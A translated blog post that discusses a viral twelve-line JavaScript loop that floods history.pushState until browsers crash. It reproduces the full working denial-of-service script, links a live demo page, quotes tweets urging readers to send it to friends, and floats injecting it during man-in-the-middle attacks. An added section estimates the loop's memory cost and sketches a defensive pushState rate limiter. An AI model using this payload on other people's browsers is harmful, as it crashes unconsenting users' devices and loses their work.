Late-night topic: How did these twelve lines of code make the browser explode?
Cause
Today we came across an eye-catching tweet from Cyber Security (@Cyber_sec):
Crash firefox, chrome, safari browsers, and also restart iphone using this javascript code. #dos #0day #exploit // Use the following JavaScript code to crash Firefox, Chrome, and Safari, and restart the iPhone.
Digging further on Twitter turned up IT Security Tweets (@F1r3h4nd):
Crash your friend's browser and restart Iphone with a link which has this script: #0day // Send your friends a link containing the following script; it can crash their browser and restart the iPhone.
The complete HTML code is as follows:
<script>
var total = "";
for (var i = 0; i < 1000000; i++) {
  total = total + i.toString();
  history.pushState(0, 0, total);
}
</script>
Demo (tip: save any work in progress in your other browser windows first):
www.0xroot.cn/demo.html (clicking it won't get you pregnant!)
What will happen next?
After opening the link, this is what I saw:
If you are on a PC, after clicking the link your CPU and memory usage will very likely go crazy until the browser crashes!
If you are on a mobile device (Android or iPhone), your browser will crash after clicking the link! Opening the link from Weibo or a client app also causes a crash. As for the iPhone restart mentioned in the tweets, this did not happen. Correction: after the link was opened in Safari on an iPhone, the phone logged out and restarted!...
Thoughts
Is this a bug or a 0day? Why does it happen? How is it implemented?
What interesting scenarios are there? (Let me start: during a man-in-the-middle (MITM) attack, this piece of JS can be injected to spoof the hacker. And I understand it all...)
You are welcome to express your views in the comments.
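On the "why does it happen" question, here is an added example that is not part of the original post: it totals what the loop asks the browser to store and shows a per-page limit on pushState stopping the same loop. The names loopCost, guardHistory and runLoopAgainstGuard are hypothetical, the history object is a constructed stub, and the code assumes each history entry keeps its own copy of the URL.

```javascript
// Added example. Assumption: every pushState call keeps its URL string
// in the session history, so the loop's cost is the sum of all URL lengths.
function loopCost(n) {
  let urlLen = 0, retained = 0;
  for (let i = 0; i < n; i++) {
    urlLen += String(i).length; // total = total + i.toString()
    retained += urlLen;         // one more entry holding the whole URL
  }
  return { urlLen, retained };  // characters, not bytes
}

// Hypothetical guard: refuse pushState once a page makes more than
// maxCalls calls within windowMs, or passes a URL longer than maxUrlLen.
// The default limits are illustrative values chosen for this example.
function guardHistory(target, opts = {}) {
  const { maxCalls = 100, windowMs = 30000, maxUrlLen = 2048, now = Date.now } = opts;
  let stamps = [];
  return {
    pushState(state, title, url) {
      const t = now();
      stamps = stamps.filter((s) => t - s < windowMs);
      if (stamps.length >= maxCalls) throw new Error("pushState budget exceeded");
      if (String(url).length > maxUrlLen) throw new Error("pushState URL too long");
      stamps.push(t);
      return target.pushState(state, title, url);
    },
  };
}

// Replay the page's loop against a constructed stub history behind the guard.
function runLoopAgainstGuard(iterations, opts) {
  const entries = [];
  const guarded = guardHistory({ pushState: (s, t, url) => entries.push(url) }, opts);
  let total = "", blockedAt = -1, reason = "";
  for (let i = 0; i < iterations; i++) {
    total = total + i.toString();
    try {
      guarded.pushState(0, 0, total);
    } catch (e) {
      blockedAt = i; reason = e.message;
      break;
    }
  }
  return { accepted: entries.length, blockedAt, reason };
}

console.log(loopCost(1000000), runLoopAgainstGuard(1000));
```

Under the stated assumption, the last URL of the full million-iteration loop is 5,888,890 characters long and the entries together hold more than 10^12 characters, which is why memory runs out long before the loop finishes. With the example's default limits the guarded loop is cut off after 100 accepted calls.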
Excerpts from the Weibo comments/discussion
Pregnant... interesting... terrible...
I am already suffering from a lot of attacks)
Ten seconds after Firefox crashes, a pop-up window prompts that the script has no response and can be stopped.
Is it history stack overflow?
Yes. get √
JS is the best language in the world!
Why is hist. pushState used?
The computer is restarting.
Why can't I just hire me?
There is no problem with Chrome incognito mode.